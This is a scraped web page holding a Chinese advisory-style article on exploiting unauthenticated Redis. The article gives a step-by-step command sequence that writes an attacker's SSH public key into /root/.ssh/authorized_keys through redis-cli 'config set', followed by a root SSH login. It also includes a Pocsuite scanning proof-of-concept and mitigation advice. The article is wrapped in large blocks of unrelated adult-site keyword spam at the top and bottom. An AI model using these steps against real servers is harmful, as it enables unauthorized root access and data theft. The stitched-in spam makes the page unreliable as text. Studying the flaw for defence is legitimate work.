婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > Redis未授權(quán)訪問配合SSH key文件利用詳解

Redis未授權(quán)訪問配合SSH key文件利用詳解

熱門標簽:廊坊外呼系統(tǒng)在哪買 一個地圖標注多少錢 南京手機外呼系統(tǒng)廠家 地圖標注工廠入駐 400電話辦理的口碑 b2b外呼系統(tǒng) 臺灣電銷 四川穩(wěn)定外呼系統(tǒng)軟件 高碑店市地圖標注app

前言

Redis是一個開源的使用ANSI C語言編寫、支持網(wǎng)絡(luò)、可基于內(nèi)存亦可持久化的日志型、Key-Value數(shù)據(jù)庫,并提供多種語言的API。

Redis 未授權(quán)訪問的問題是一直存在的問題,知道創(chuàng)宇安全研究團隊歷史上也做過相關(guān)的應(yīng)急,今日,又出現(xiàn) Redis 未授權(quán)訪問配合 SSH key 文件被利用的情況,導致一大批 Redis 服務(wù)器被黑,今天我們來簡要的分析下。

一、漏洞概述

Redis 默認情況下,會綁定在 0.0.0.0:6379,這樣將會將 Redis 服務(wù)暴露到公網(wǎng)上,如果在沒有開啟認證的情況下,可以導致任意用戶在可以訪問目標服務(wù)器的情況下未授權(quán)訪問 Redis 以及讀取 Redis 的數(shù)據(jù)。攻擊者在未授權(quán)訪問 Redis 的情況下可以利用 Redis 的相關(guān)方法,可以成功在 Redis 服務(wù)器上寫入公鑰,進而可以使用對應(yīng)私鑰直接登錄目標服務(wù)器。

1、漏洞描述

Redis 安全模型的觀念是: “請不要將 Redis 暴露在公開網(wǎng)絡(luò)中, 因為讓不受信任的客戶接觸到 Redis 是非常危險的” 。

Redis 作者之所以放棄解決未授權(quán)訪問導致的不安全性是因為, 99.99% 使用 Redis 的場景都是在沙盒化的環(huán)境中, 為了0.01%的可能性增加安全規(guī)則的同時也增加了復雜性, 雖然這個問題的并不是不能解決的, 但是這在他的設(shè)計哲學中仍是不劃算的。

因為其他受信任用戶需要使用 Redis 或者因為運維人員的疏忽等原因,部分 Redis 綁定在 0.0.0.0:6379,并且沒有開啟認證(這是Redis 的默認配置),如果沒有進行采用相關(guān)的策略,比如添加防火墻規(guī)則避免其他非信任來源 ip 訪問等,將會導致 Redis 服務(wù)直接暴露在公網(wǎng)上,導致其他用戶可以直接在非授權(quán)情況下直接訪問Redis服務(wù)并進行相關(guān)操作。

利用 Redis 自身的提供的 config 命令,可以進行寫文件操作,攻擊者可以成功將自己的公鑰寫入目標服務(wù)器的 /root/.ssh 文件夾的authotrized_keys 文件中,進而可以直接使用對應(yīng)的私鑰登錄目標服務(wù)器。

2、漏洞影響

Redis 暴露在公網(wǎng)(即綁定在0.0.0.0:6379,目標IP公網(wǎng)可訪問),并且沒有開啟相關(guān)認證和添加相關(guān)安全策略情況下可受影響而導致被利用。

通過ZoomEye 的搜索結(jié)果顯示,有97707在公網(wǎng)可以直接訪問的Redis服務(wù)。

根據(jù) ZoomEye 的探測,全球無驗證可直接利用Redis 分布情況如下:

全球無驗證可直接利用Redis TOP 10國家與地區(qū):

3、漏洞分析與利用

首先在本地生產(chǎn)公私鑰文件:

$ssh-keygen –t rsa

然后將公鑰寫入 foo.txt 文件

$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

再連接 Redis 寫入文件

$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit
$ redis-cli -h 192.168.1.11
$ 192.168.1.11:6379> config set dir /root/.ssh/
OK
$ 192.168.1.11:6379> config get dir
1) "dir"
2) "/root/.ssh"
$ 192.168.1.11:6379> config set dbfilename "authorized_keys"
OK
$ 192.168.1.11:6379> save
OK

這樣就可以成功的將自己的公鑰寫入 /root/.ssh 文件夾的 authotrized_keys 文件里,然后攻擊者直接執(zhí)行:

$ ssh –i id_rsa root@192.168.1.11

即可遠程利用自己的私鑰登錄該服務(wù)器。

當然,寫入的目錄不限于 /root/.ssh 下的authorized_keys,也可以寫入用戶目錄,不過 Redis 很多以 root 權(quán)限運行,所以寫入 root 目錄下,可以跳過猜用戶的步驟。

4、Redis 未授權(quán)的其他危害與利用

a)數(shù)據(jù)庫數(shù)據(jù)泄露

Redis 作為數(shù)據(jù)庫,保存著各種各樣的數(shù)據(jù),如果存在未授權(quán)訪問的情況,將會導致數(shù)據(jù)的泄露,其中包含保存的用戶信息等。

b)代碼執(zhí)行

Redis可以嵌套Lua腳本的特性將會導致代碼執(zhí)行, 危害同其他服務(wù)器端的代碼執(zhí)行, 樣例如下        一旦攻擊者能夠在服務(wù)器端執(zhí)行任意代碼, 攻擊方式將會變得多且復雜, 這是非常危險的.

通過Lua代碼攻擊者可以調(diào)用 redis.sha1hex() 函數(shù),惡意利用 Redis 服務(wù)器進行 SHA-1 的破解。

c)敏感信息泄露

通過 Redis 的 INFO 命令, 可以查看服務(wù)器相關(guān)的參數(shù)和敏感信息, 為攻擊者的后續(xù)滲透做鋪墊。

可以看到泄露了很多 Redis 服務(wù)器的信息, 有當前 Redis 版本, 內(nèi)存運行狀態(tài), 服務(wù)端個數(shù)等等敏感信息。

5、漏洞驗證

可以使用Pocsuite(http://github.com/knownsec/pocsuite)執(zhí)行以下的代碼可以用于測試目標地址是否存在未授權(quán)的Redis服務(wù)。

#!/usr/bin/env python
# -*- coding:utf-8 -*-
 
import socket
import urlparse
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
 
 
class TestPOC(POCBase):
 vulID = '89339'
 version = '1'
 author = ['Anonymous']
 vulDate = '2015-10-26'
 createDate = '2015-10-26'
 updateDate = '2015-10-26'
 references = ['http://sebug.net/vuldb/ssvid-89339']
 name = 'Redis 未授權(quán)訪問 PoC'
 appPowerLink = 'http://redis.io/'
 appName = 'Redis'
 appVersion = 'All'
 vulType = 'Unauthorized access'
 desc = '''
  redis 默認不需要密碼即可訪問,黑客直接訪問即可獲取數(shù)據(jù)庫中所有信息,造成嚴重的信息泄露。
 '''
 samples = ['']
 
 def _verify(self):
  result = {}
  payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
  s = socket.socket()
  socket.setdefaulttimeout(10)
  try:
   host = urlparse.urlparse(self.url).netloc
   port = 6379
   s.connect((host, port))
   s.send(payload)
   recvdata = s.recv(1024)
   if recvdata and 'redis_version' in recvdata:
    result['VerifyInfo'] = {}
    result['VerifyInfo']['URL'] = self.url
    result['VerifyInfo']['Port'] = port
  except:
   pass
  s.close()
  return self.parse_attack(result)
 
 def _attack(self):
  return self._verify()
 
 def parse_attack(self, result):
  output = Output(self)
  if result:
   output.success(result)
  else:
   output.fail('Internet nothing returned')
  return output
 
register(TestPOC)

二、安全建議

配置bind選項,限定可以連接Redis服務(wù)器的IP,修改 Redis 的默認端口6379

配置認證,也就是AUTH,設(shè)置密碼,密碼會以明文方式保存在Redis配置文件中

配置rename-command 配置項 “RENAME_CONFIG”,這樣即使存在未授權(quán)訪問,也能夠給攻擊者使用config 指令加大難度

好消息是Redis作者表示將會開發(fā)”real user”,區(qū)分普通用戶和admin權(quán)限,普通用戶將會被禁止運行某些命令,如config

總結(jié)

以上就是這篇文章的全部內(nèi)容了,希望本文的內(nèi)容對大家的學習或者工作具有一定的參考學習價值,如果有疑問大家可以留言交流,謝謝大家對腳本之家的支持。

您可能感興趣的文章:
  • Redis批量刪除KEY的方法
  • Redis教程(七):Key操作命令詳解
  • Redis獲取某個前綴的key腳本實例
  • redis數(shù)據(jù)庫查找key在內(nèi)存中的位置的方法
  • 關(guān)于使用key/value數(shù)據(jù)庫redis和TTSERVER的心得體會
  • 關(guān)于redis Key淘汰策略的實現(xiàn)方法
  • Redis獲取某個大key值的腳本實例
  • redis 用scan指令 代替keys指令(詳解)
  • redis中熱key問題該如何解決

標簽:泰州 伊春 甘南 南寧 河源 拉薩 畢節(jié) 定州

巨人網(wǎng)絡(luò)通訊聲明:本文標題《Redis未授權(quán)訪問配合SSH key文件利用詳解》,本文關(guān)鍵詞  Redis,未,授權(quán),訪問,配合,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P(guān)信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《Redis未授權(quán)訪問配合SSH key文件利用詳解》相關(guān)的同類信息!
  • 本頁收集關(guān)于Redis未授權(quán)訪問配合SSH key文件利用詳解的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    欧美亚洲综合久久| 91精品国产高清一区二区三区蜜臀| 欧美日韩精品高清| 亚洲成人福利片| 粉嫩嫩av羞羞动漫久久久| 日韩欧美二区三区| 日本欧美一区二区在线观看| 黄色日韩三级电影| 美女视频网站黄色亚洲| 91精品欧美久久久久久动漫| 亚洲国产日韩一级| 欧美日韩国产精品成人| 亚洲综合偷拍欧美一区色| 日本成人在线一区| 91精品麻豆日日躁夜夜躁| 蜜臀av一区二区三区| 欧美www视频| 99精品欧美一区二区三区综合在线| 国产日韩精品一区二区浪潮av| 久久国产婷婷国产香蕉| 久久久久99精品一区| 成人午夜精品在线| 有码一区二区三区| 精品久久久久久久久久久久久久久久久 | 日韩欧美国产一区在线观看| 日av在线不卡| 精品欧美乱码久久久久久| 欧美一级欧美一级在线播放| 蜜桃av一区二区在线观看| 欧美一区二区三区思思人| 老司机免费视频一区二区三区| 欧美乱妇一区二区三区不卡视频| 最近中文字幕一区二区三区| 欧美精品自拍偷拍动漫精品| 五月天婷婷综合| 精品国产亚洲一区二区三区在线观看| 国产99久久久国产精品潘金 | 亚洲综合视频网| 不卡电影一区二区三区| 一区二区三区四区视频精品免费| 91精品国产综合久久久久久久| 国产激情91久久精品导航| 亚洲人吸女人奶水| 激情综合色播五月| 一本到不卡免费一区二区| 亚洲成人精品在线观看| 精品国产凹凸成av人网站| 色婷婷综合久久久中文一区二区| 午夜精品久久久久久久久久久 | 精品成a人在线观看| 91浏览器打开| 国产成人综合在线播放| 亚洲国产综合人成综合网站| 日日摸夜夜添夜夜添亚洲女人| 国产精品久久久久久久裸模| 亚洲伦理在线精品| 日韩视频免费观看高清在线视频| 日韩不卡在线观看日韩不卡视频| 久久久久久99精品| 欧美日韩在线免费视频| 不卡一区二区在线| 成人综合婷婷国产精品久久蜜臀| 亚洲不卡在线观看| 亚洲香蕉伊在人在线观| 亚洲欧美日韩国产综合在线| 欧美刺激脚交jootjob| 色综合婷婷久久| 欧美日韩国产色站一区二区三区| 国产激情一区二区三区四区| 日韩一区在线看| 久久久久97国产精华液好用吗| 欧美一区二区视频免费观看| 欧美午夜一区二区三区| 国产美女精品人人做人人爽| 欧美精品自拍偷拍动漫精品| 91福利精品第一导航| 日韩精品一区第一页| 伊人色综合久久天天人手人婷| 国产精品嫩草99a| 国产日韩欧美精品综合| 久久久天堂av| 欧美国产欧美亚州国产日韩mv天天看完整| 色婷婷av一区二区| av激情成人网| 欧美亚洲丝袜传媒另类| 成人毛片老司机大片| 亚洲bt欧美bt精品| 久久久久久久电影| 国产永久精品大片wwwapp | 在线免费观看成人短视频| 不卡视频免费播放| 成人深夜在线观看| 色哟哟欧美精品| 高清视频一区二区| 成人国产在线观看| av一区二区三区在线| 粉嫩高潮美女一区二区三区| 国产九色sp调教91| 成人小视频免费在线观看| 在线中文字幕一区| 欧美一区二区网站| 国产精品免费av| 久久se精品一区精品二区| 韩国成人精品a∨在线观看| 国产欧美一区二区三区网站| 亚洲激情图片一区| 精品无人区卡一卡二卡三乱码免费卡 | 亚洲成在人线在线播放| 亚洲超丰满肉感bbw| 国产原创一区二区三区| 93久久精品日日躁夜夜躁欧美| 在线观看成人小视频| 在线综合视频播放| 亚洲国产电影在线观看| 亚洲另类色综合网站| 午夜精品在线视频一区| 高清不卡一区二区| 91精品在线一区二区| 洋洋成人永久网站入口| 亚洲激情在线激情| 国产福利91精品一区二区三区| 欧美性猛片xxxx免费看久爱| 7777女厕盗摄久久久| 久久久久久久久伊人| 美脚の诱脚舐め脚责91| 久久精品综合网| 亚洲777理论| aaa欧美大片| 久久久久久久久久久黄色| 性做久久久久久| 日本韩国精品一区二区在线观看| 国产清纯白嫩初高生在线观看91 | 色爱区综合激月婷婷| 国产日韩亚洲欧美综合| 美女www一区二区| 91免费国产视频网站| 91国在线观看| 蜜桃精品视频在线| 亚洲第一久久影院| 蜜臀国产一区二区三区在线播放 | 日韩一区二区三区免费观看| 久久先锋资源网| 日韩女优制服丝袜电影| 国产亚洲制服色| 日本中文字幕一区二区有限公司| 欧美综合色免费| 午夜精品一区二区三区免费视频| 成人性生交大片免费看视频在线| 欧美激情一区二区三区| 国产精品资源在线| 亚洲欧洲国产日本综合| www.欧美色图| 午夜精品久久久久久久久| 亚洲高清免费视频| yourporn久久国产精品| 91.com视频| 麻豆成人91精品二区三区| 欧美一级高清大全免费观看| 亚洲成人免费在线观看| 91精品国产综合久久精品图片| 日精品一区二区| 精品国产髙清在线看国产毛片| 国产精品77777竹菊影视小说| 日韩欧美一区电影| 国产高清不卡二三区| 国产精品免费aⅴ片在线观看| 91极品美女在线| 日韩精品午夜视频| 久久亚洲一区二区三区明星换脸| 久久精品国产在热久久| 中文字幕欧美区| 6080亚洲精品一区二区| 国产馆精品极品| 中文字幕在线播放不卡一区| www.亚洲在线| 日韩中文字幕不卡| 国产日韩av一区| 欧美精品乱码久久久久久按摩| 久久精品国产亚洲a| 国产精品久久久久桃色tv| 欧美在线999| 国模无码大尺度一区二区三区| 亚洲欧洲三级电影| 91麻豆精品国产91久久久久久| 国产成人在线免费| 依依成人精品视频| 2欧美一区二区三区在线观看视频| 成人av网址在线观看| 免费在线观看一区二区三区| 亚洲日本中文字幕区| 久久免费午夜影院| 欧美男同性恋视频网站| 91小视频在线观看| 国产成人精品免费在线| 日韩黄色小视频| 一区二区在线观看不卡| 久久色.com| 日韩欧美的一区| 欧美在线|欧美| 欧美亚洲一区二区三区四区|